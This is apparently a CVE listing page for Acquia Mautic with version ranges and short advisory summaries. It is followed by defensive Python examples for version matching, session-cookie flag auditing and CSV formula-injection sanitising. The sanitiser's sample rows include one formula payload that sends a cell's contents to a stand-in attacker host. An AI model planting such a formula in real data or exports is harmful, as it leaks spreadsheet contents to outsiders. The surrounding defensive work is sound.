Product: Acquia Mautic
41 known vulnerabilities across versions
Vulnerabilities are listed by affected version; each CVE links to the full briefing and its intelligence graph. The affected range is the database record for the entry; where it disagrees with the advisory text (for example "all versions" beside a summary that names a single release, or a range that ends before the release the summary names), read the advisory before concluding that a version is clean.
CVE-2026-3105 (affected: >= 2.10.0 and < 4.4.19)
Summary: This advisory addresses a SQL injection vulnerability in the API endpoint used for retrieving contact activities. A vulnera

CVE-2024-47055 (affected: >= 5.0.0 and < 5.2.6)
Summary: This advisory addresses a security vulnerability in Mautic related to the segment cloning functionality. This vulnerability

CVE-2024-47053 (affected: >= 1.0.1 and < 5.2.3)
This advisory addresses an authorization vulnerability in Mautic's HTTP Basic Authentication implementation. This flaw could allow

CVE-2024-47051 (affected: < 5.2.3)
This advisory addresses two critical security vulnerabilities present in Mautic versions before 5.2.3. These vulnerabilities could

CVE-2022-25773 (affected: < 5.2.3)
This advisory addresses a file placement vulnerability that could allow assets to be uploaded to unintended directories on the ser

CVE-2024-47059 (affected: all versions)
When logging in with the correct username and incorrect weak password, the user receives the notification that their password is

CVE-2022-25770 (affected: >= 1.0.1 and < 4.4.13)
Mautic allows you to update the application via an upgrade script. The upgrade logic isn't shielded off correctly, which may lead

CVE-2021-27917 (affected: > 1.0.0 and < 4.4.13)
Prior to this patch, a stored XSS vulnerability existed in the contact tracking and page hits report.

CVE-2024-47058 (affected: >= 1.0.0 and < 4.4.13)
With access to edit a Mautic form, the attacker can add Cross-Site Scripting stored in the html field. This could be used to steal

CVE-2024-47050 (affected: >= 2.6.0 and < 4.4.13)
Prior to this patch being applied, Mautic's tracking was vulnerable to Cross-Site Scripting through the Page URL variable.

CVE-2022-25768 (affected: >= 1.1.3 and < 4.4.13)
The logic in place to facilitate the update process via the user interface lacks access control to verify if permission exists to

CVE-2022-25777 (affected: >= 1.0.1 and < 4.4.12)
Prior to the patched version, an authenticated user of Mautic could read system files and access the internal addresses of the app

CVE-2022-25776 (affected: >= 1.0.2 and < 4.4.12)
Prior to the patched version, logged in users of Mautic are able to access areas of the application that they should be prevented

CVE-2022-25775 (affected: >= 2.14.1 and < 4.4.12)
Prior to the patched version, logged in users of Mautic are vulnerable to an SQL injection vulnerability in the Reports bundle. T

CVE-2022-25774 (affected: < 4.4.12)
Prior to the patched version, logged in users of Mautic are vulnerable to a self XSS vulnerability in the notifications within Mau

CVE-2022-25769 (affected: < 3.3.5)
Impact: The default .htaccess file has some restrictions in the access to PHP files to only allow specific PHP files to be executed

CVE-2021-27916 (affected: >= 3.3.0 and < 4.4.12)
Prior to the patched version, logged in users of Mautic are vulnerable to Relative Path Traversal/Arbitrary File Deletion. Regardl

CVE-2021-27915 (affected: >= 1.0.0 and < 4.4.12)
Prior to the patched version, there is an XSS vulnerability in the description fields within the Mautic application which could be

CVE-2022-25772 (affected: < 4.3.0)
A cross-site scripting (XSS) vulnerability in the web tracking component of Mautic before 4.3.0 allows remote attackers to inject

CVE-2021-27914 (affected: < 4.3.0)
A cross-site scripting (XSS) vulnerability in the installer component of Mautic before 4.3.0 allows admins to inject executable ja

CVE-2021-27913 (affected: < 3.3.4)
The function mt_rand is used to generate session tokens; this function is cryptographically flawed due to its nature being one pse

CVE-2021-27912 (affected: < 3.3.4)
Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack when viewing Mautic assets by utilizing inline JS in

CVE-2021-27911 (affected: < 3.3.4)
Mautic versions before 3.3.4/4.0.0 are vulnerable to an inline JS XSS attack through the contact's first or last name and triggere

CVE-2021-27910 (affected: < 3.3.4)
Insufficient sanitization / filtering allows for arbitrary JavaScript Injection in Mautic using the bounce management callback fun

CVE-2021-27909 (affected: < 3.3.4)
For Mautic versions prior to 3.3.4/4.0.0, there is an XSS vulnerability on Mautic's password reset page where a vulnerable paramet

CVE-2021-27908 (affected: < 3.3.2)
In all versions prior to Mautic 3.3.2, secret parameters such as database credentials could be exposed publicly by an authorized a

CVE-2020-35125 (affected: < 2.16.5)
A cross-site scripting (XSS) vulnerability in the forms component of Mautic before 3.2.4 allows remote attackers to inject executa

CVE-2020-35124 (affected: < 3.2.4)
A cross-site scripting (XSS) vulnerability in the assets component of Mautic before 3.2.4 allows remote attackers to inject execut

CVE-2020-35129 (affected: < 3.2.4)
Mautic before 3.2.4 is affected by stored XSS. An attacker with access to Social Monitoring, an application feature, could attack

CVE-2020-35128 (affected: >= 2.0.0 and < 2.16.5)
Mautic before 3.2.4 is affected by stored XSS. An attacker with permission to manage companies, an application feature, could atta

CVE-2018-11200 (affected: all versions)
An issue was discovered in Mautic 2.13.1. It has Stored XSS via the company name field.

CVE-2018-11198 (affected: all versions)
An issue was discovered in Mautic 2.13.1. There is Stored XSS via the authorUrl field in config.json.

CVE-2018-8092 (affected: < 2.13.0)
Mautic before 2.13.0 allows CSV injection.

CVE-2018-8071 (affected: < 2.13.0)
Mautic before v2.13.0 has stored XSS via a theme config file.

CVE-2018-10189 (affected: >= 1.0.0 and <= 1.4.1)
An issue was discovered in Mautic 1.x and 2.x before 2.13.0. It is possible to systematically emulate tracking cookies per contact

CVE-2017-1000506 (affected: <= 2.11.0)
Mautic version 2.11.0 and earlier contains a Cross Site Scripting (XSS) vulnerability in Company's name that can result in denial

CVE-2017-1000490 (affected: all versions)
Mautic versions 1.0.0 - 2.11.0 are vulnerable to allowing any authorized Mautic user session (must be logged into Mautic) to use t

CVE-2017-1000489 (affected: all versions)
Mautic versions 2.0.0 - 2.11.0 with a SSO plugin installed could allow a disabled user to still login using email address

CVE-2017-1000488 (affected: all versions)
Mautic version 2.1.0 - 2.11.0 is vulnerable to an inline JS XSS attack when using Mautic forms on a Mautic landing page using GET

CVE-2017-1000046 (affected: <= 2.6.1)
Mautic 2.6.1 and earlier fails to set flags on session cookies

CVE-2017-8874 (affected: all versions)
Multiple cross-site request forgery (CSRF) vulnerabilities in Mautic 1.4.1 allow remote attackers to hijack the authentication of
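The practical question this listing answers is "which of these apply to the Mautic I am running?", and the range strings follow a small grammar (">= X and < Y", "< Y", "<= Y", "all versions"). The following is an added example, not part of the listing and not Mautic code: it parses that grammar and matches a version against it. The table holds a subset of the ranges copied from the entries above, paired with CVE IDs in the order the page lists them; "all versions" is taken literally as the page records it, and since several such entries carry a summary naming one release, a hit on one of those is a prompt to read the advisory rather than a confirmed exposure.

```python
"""Match an installed Mautic version against the affected-version ranges
on this page.

Added example; not part of the listing and not Mautic code. The range strings
are copied from the entries above (a subset) and the CVE-to-range pairing
follows the order in which the page lists them.
"""
import re

# Ranges copied from the listing above (subset), keyed by CVE ID.
AFFECTED = {
    "CVE-2026-3105": ">= 2.10.0 and < 4.4.19",
    "CVE-2024-47055": ">= 5.0.0 and < 5.2.6",
    "CVE-2024-47053": ">= 1.0.1 and < 5.2.3",
    "CVE-2024-47058": ">= 1.0.0 and < 4.4.13",
    "CVE-2022-25775": ">= 2.14.1 and < 4.4.12",
    "CVE-2021-27913": "< 3.3.4",
    "CVE-2018-8092": "< 2.13.0",
    "CVE-2017-1000046": "<= 2.6.1",
    "CVE-2017-8874": "all versions",   # recorded as such on the page; summary names 1.4.1
}

# One clause of a range: a comparison operator followed by a dotted numeric version.
_CLAUSE = re.compile(r"^(<=|>=|<|>)\s*(\d+(?:\.\d+)*)$")

_OPS = {
    "<": lambda v, b: v < b,
    "<=": lambda v, b: v <= b,
    ">": lambda v, b: v > b,
    ">=": lambda v, b: v >= b,
}


def parse_version(text):
    """'5.2.3' -> (5, 2, 3); short forms are padded so that '5.2' == '5.2.0'."""
    parts = tuple(int(p) for p in text.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def parse_range(spec):
    """Turn one range string from the listing into a predicate on parsed versions."""
    spec = spec.strip()
    if spec == "all versions":
        return lambda v: True
    checks = []
    for clause in spec.split(" and "):
        m = _CLAUSE.match(clause.strip())
        if m is None:
            raise ValueError(f"unrecognised range clause: {clause!r}")
        checks.append((_OPS[m.group(1)], parse_version(m.group(2))))
    return lambda v: all(op(v, bound) for op, bound in checks)


def affected_cves(version, table=AFFECTED):
    """Return the sorted CVE IDs whose recorded range contains `version`."""
    v = parse_version(version)
    return sorted(cve for cve, spec in table.items() if parse_range(spec)(v))


if __name__ == "__main__":
    for ver in ("2.6.1", "4.4.12", "5.2.6"):
        print(ver, "->", ", ".join(affected_cves(ver)) or "none")
```

Bounds are compared as integer tuples rather than strings, so "4.4.12" sorts below "4.4.19" as intended; a string comparison would also put "4.4.9" above "4.4.12", which is the usual mistake in hand-rolled version checks. Extend `AFFECTED` with the remaining entries from the listing to get a full report.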
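CVE-2017-1000046 above records that Mautic 2.6.1 and earlier fails to set flags on session cookies. Whether an instance (patched or not) actually issues its session cookie with Secure, HttpOnly and a restrictive SameSite is something to verify on the wire rather than assume from the version. The following is an added example, not Mautic code: it parses Set-Cookie headers and reports which of those flags a session cookie lacks. The header lines are constructed for the demonstration; in practice they come from the response to a login request against the instance under test. PHPSESSID is PHP's default session cookie name, used here as the default; a deployment may configure another, so pass the names actually in use.

```python
"""Audit Set-Cookie headers for the flags that CVE-2017-1000046 reports
Mautic 2.6.1 and earlier failing to set on session cookies.

Added example, not Mautic code. Header lines below are constructed.
"""


def parse_set_cookie(header):
    """Split one Set-Cookie value into (cookie name, {attribute: value}).

    Attribute names are lower-cased so 'HttpOnly' and 'httponly' compare equal.
    An optional 'Set-Cookie:' prefix is tolerated so raw header lines can be fed in.
    """
    value = header.strip()
    if value.lower().startswith("set-cookie:"):
        value = value[len("set-cookie:"):].strip()
    pieces = [p.strip() for p in value.split(";")]
    name = pieces[0].split("=", 1)[0].strip()
    attrs = {}
    for piece in pieces[1:]:
        if piece:
            key, _, val = piece.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name, attrs


def missing_flags(attrs):
    """Flags a session cookie should carry but this one does not."""
    missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
    # SameSite=None (or no SameSite at all) gives no cross-site protection,
    # so only Lax or Strict is counted as present.
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("samesite")
    return missing


def audit_session_cookies(header_lines, session_names=("PHPSESSID",)):
    """Map each session cookie name seen to the list of flags it lacks.

    Cookies not named in `session_names` are ignored; an empty list means
    the cookie carried every flag checked for.
    """
    findings = {}
    for line in header_lines:
        name, attrs = parse_set_cookie(line)
        if name in session_names:
            findings[name] = missing_flags(attrs)
    return findings


# Constructed sample headers: a bare session cookie plus a non-session cookie
# the audit should ignore, and separately a hardened session cookie.
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=8f2c1e7a; path=/",
    "Set-Cookie: example_tracking=42; path=/",
]
HARDENED_HEADERS = [
    "Set-Cookie: PHPSESSID=8f2c1e7a; path=/; Secure; HttpOnly; SameSite=Lax",
]

if __name__ == "__main__":
    print(audit_session_cookies(SAMPLE_HEADERS))    # {'PHPSESSID': ['secure', 'httponly', 'samesite']}
    print(audit_session_cookies(HARDENED_HEADERS))  # {'PHPSESSID': []}
```

Run it against the headers of the response that sets the session after a successful login, not against the landing page: the cookie of interest is the authenticated one. The Secure flag only matters if the instance is served over HTTPS, which any Mautic instance handling contact data should be.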
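CVE-2018-8092 above is a one-line entry ("Mautic before 2.13.0 allows CSV injection"), so the mechanism is worth spelling out: a spreadsheet application treats a cell that begins with =, +, -, @ (and, in some versions, a tab or carriage return) as a formula, so attacker-controlled data such as a contact's first name can execute when an exported CSV is opened. The following is an added example, not Mautic code, showing the usual exporter-side mitigation: prefix any such cell with a single quote so it is read as text. The contact rows are constructed.

```python
"""Neutralise formula injection in CSV exports, the class of bug that
CVE-2018-8092 records for Mautic before 2.13.0.

Added example, not Mautic code. The rows below are constructed.
"""
import csv
import io

# Leading characters that make a spreadsheet treat the cell as a formula.
_FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def sanitise_cell(value):
    """Prefix a formula-looking cell with a quote so it is read as text.

    The leading quote stays visible in the cell; that is the trade-off for
    keeping the export lossless (the original value can still be recovered).
    """
    text = "" if value is None else str(value)
    if text.startswith(_FORMULA_PREFIXES):
        return "'" + text
    return text


def export_csv(rows, header):
    """Write rows as CSV with every data cell sanitised; returns the CSV text."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow(sanitise_cell(cell) for cell in row)
    return buf.getvalue()


# Constructed contact rows: one hostile first name that would exfiltrate the
# neighbouring cell via a hyperlink, one legitimate value that starts with a
# minus sign and gets the same treatment (false positives are the cost), and
# one ordinary row.
SAMPLE_ROWS = [
    ("=HYPERLINK(\"http://attacker.example/\"&A1,\"click\")", "Doe", "jane@example.com"),
    ("-5", "Roe", "richard@example.com"),
    ("Alice", "Smith", "alice@example.com"),
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS, ("first", "last", "email")))
```

The quote prefix is applied at export time only; the stored value is untouched, so the same check has to sit on every export path (contacts, companies, reports) rather than on one. Sanitising on input instead would corrupt legitimate data such as phone numbers written with a leading "+".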